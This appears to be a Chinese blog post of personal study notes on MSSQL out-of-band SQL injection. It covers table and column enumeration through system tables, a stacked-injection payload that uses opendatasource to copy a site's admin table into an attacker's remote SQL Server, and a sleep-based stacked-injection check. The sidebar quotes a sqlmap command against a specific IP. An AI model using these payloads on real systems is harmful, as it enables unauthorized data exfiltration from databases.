MSSQL注入 — 反弹注入

已于 2022-09-21 23:58:32 修改
阅读量686 收藏 1
点赞数 1
分类专栏: 渗透原理篇 文章标签: 安全
于 2022-09-21 19:58:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/126976309
版权

注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!

一、MSSQL反弹注入使用场景

MSSQL=>SQL Server

MSSQL注入:

反弹注入=>注入手法比较偏门(oob)

把查询到的数据插入到外部数据库中(公网ip)

二、MSSQL显错注入

information_schema

sysobjects        查表

select  id,name...  from  sysobjects where xtype='U'       输出id这里可以在后面用的到

syscolumns        查字段

select  id,name from  syscolumns  where  id='前面查到的id值'

三、MSSQL反弹注入语句解析

反弹注入原理,将目标的数据全部反弹到自己构造的数据库中,opendatasource就是连接自己数据库用的(切勿用于其他用途,仅用于技术的学习

insert  into  opendatasource( ' sqloledb ' , ' server= 数据库地址,1433端口;uid=账户名;pwd=密码;database=数据库名 ').数据库名.dbo.字段               (字段可以多个,逗号隔开)

连接数据库.库.权限.表

堆叠注入

通过分号,可以执行后面的语句

select * from news where  id=1;insert  into  opendatasource( ' sqloledb ' , ' server= hacker数据库地址,1433端口;uid=账户名;pwd=密码;database=hacker数据库名 ').数据库名.dbo.表名  select  *(被攻击网站的字段,通过order by已经判断出来了)  from admin

这个表是黑客特地构造出来的,要与网站字段数是一样的,并且字段类型也要一致

堆叠注入的判断

在传参后面加入分号,若结果一致就是大概率存在堆叠注入

可在传参后加入select  sleep(10)

select  * from news  where  id =1; select  sleep(10)

不习惯有你
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
正向shell和反弹shell
weixin_45936149的博客
03-26 9377
正向shell反弹shell的利用场景以及使用技巧
利用MSSQL的OPENDATASOURCE把文本文件中的数据插入、更新到ORACLE
03-18
利用MSSQL的OPENDATASOURCE把文本文件中的数据插入、更新到ORACLE
内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell
zh的博客
10-24 3937
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
MSSQL注入——反弹注入
m0_55854679的博客
02-18 900
文章目录MSSQL【SQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQL【SQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
mysql反弹注入平台_MSSQL注入--反弹注入
weixin_30284287的博客
02-11 205
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...
【MSSQL-反弹注入
weixin_52351575的博客
09-20 377
注意后方的输出位必须和联合查询的数据类型一样,但不知道数据类型我们可以直接用null代替(绕过)这里需要注意MSSQL的库名不是database()而是db_name()下一步,得到admin表的id查admin表下的列。先查出各个表的id作为检索内容。最后提交flag结束!
MSSQL注入反弹注入
MSB_WLAQ的博客
10-06 416
MSSQL反弹注入原理 依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景 用香港云快速搭建一个MSSQL环境 可以用临时邮箱注册免费的试用60天。 免费60天的试用,过期了就换个邮箱。 1.猜数据时为什么不能用数字 根据了MSSQL的特性,虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗 有 为master.dbo.sysdatabase 3.反弹注入满足的条件 能否堆叠查询,...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
mysql5 注入漏洞
10-30
MySQL5注入漏洞是一种常见的安全问题,它发生在应用程序与数据库交互时,由于不恰当的数据过滤或错误的查询构造,使得攻击者能够向SQL语句中插入恶意代码,从而获取、修改、删除数据库中的敏感信息,甚至控制整个...
mysql注入绕过技术
06-04
mysql注入绕过技术
mysql注入环境
01-16
MySQL注入环境是一个重要的网络安全话题,主要关注的是数据库系统的安全性和数据保护。在本文中,我们将深入探讨MySQL注入的原理、如何在Linux或Windows环境中搭建测试环境,以及如何使用sqli-labs进行实战演练。 ...
PHP+MYSQL 注入靶场
最新发布
04-26
SQL注入通常针对的是数据库的查询操作,因此了解MySQL的语法和特性对于识别和利用潜在的注入点至关重要。例如,了解如何使用`UNION SELECT`、`LIKE`、`OR`等操作符构造恶意查询,或者如何通过`LIMIT`和`ORDER BY`来...
MSSQL-反弹注入(zkaq靶场)
v2ish1yan的博客
04-29 3346
MSSQL就是sql server 他跟mysql进行注入的方式有所不同 这里写两种方法 1.联合查询注入 首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类型一样,但是可以使用null来填充 首先来猜字段 order by 3时正确,order by 4时错误 所以字段数为3 然后进行猜数据类型。先 ?id=1’ union all select NULL,NULL,NULL – qwe 回显正常 挨个测试数据类型 ?id=1’ union all sele
MSSQL反弹注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-17 497
MSSSQL注入——反弹注入 我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入MYSQL不太一样) 我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – + select name from dbo.sysdatabases 查询系统库 sysobjects 查询系统表 (xtype=‘U’) syscolumns 字段 (id= ) 指定sysobjects库中表名对应id 先尝试显错注入 ‘ and o
MSSQL--反弹注入
qq_68233961的博客
08-15 224
MSSQL--反弹注入
Sql server注入分类之盲注(布尔-时间-OOB)
qq_42990434的博客
12-16 2267
本章目录:布尔盲注第一步 判断注入第二步 猜解列数第三步 猜数据库名,表名:第四步 猜解字段第五步 判断字段长度第六步 猜解字段内容时间盲注利用条件注入语句OOB 注入利用条件原理检测利用/渗出 布尔盲注 总结: 布尔盲注就是靠逐个猜测与尝试弱口令的的方法,有报错的就是猜错了,没报错就对了。 第一步 判断注入 and 1=1 and 1=2 第二步 猜解列数 order by 1 #返回正确 order by 2 #返回正确 order by 3 #抛出错误 第三步 猜数据
mysql注入-OOB注入
weixin_44316992的博客
12-07 1041
OOB注入 带外通道技术(Out-Of-Band ) 带外通道技术(OOB)让攻击者能够通过另一种方式来确认和利用没有直接回显的漏洞。 这一类漏洞中,攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。 带外通道技术通常需要脆弱的实体来生成带外的TCP/UDP/ICMP请求,然后,攻击者可以通过这个请求来提取数据。 利用条件: 脆弱的系统 预备知识点 DNS查询 UNC路径——可以用于共享文件夹 UNC( Universal Naming Convention)/通用命名规则 Windows主机默认
五、注入(4)MSsql注入——反弹注入
weixin_45540609的博客
04-21 193
MSSQL反弹注入 当明明是注入点却无法进行注入注入工具猜解速度缓慢,错误提示信息关闭,无法返回注入结果等。这时比较好的方法就是使用反弹注入,需要依靠opendatasource函数支持。 反弹注入:目标站点把查询数据的结果插入到黑客的数据库里 条件: 1、网络通畅(需要公网ip) 2、自己的MSSQL数据库 可以申请一个免费的虚拟空间,虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境且不需要特意购置云服务器来获取一个公网IP。 香港云 http://www.webweb..
mysql 注入扫描
12-02
MySQL注入扫描是一种针对网站或应用程序的安全漏洞进行检测的技术。通过MySQL注入漏洞,攻击者可以将恶意代码注入到网站或应用程序中,从而获取敏感信息、通过数据库执行命令或者破坏网站功能。因此,对于网站或应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值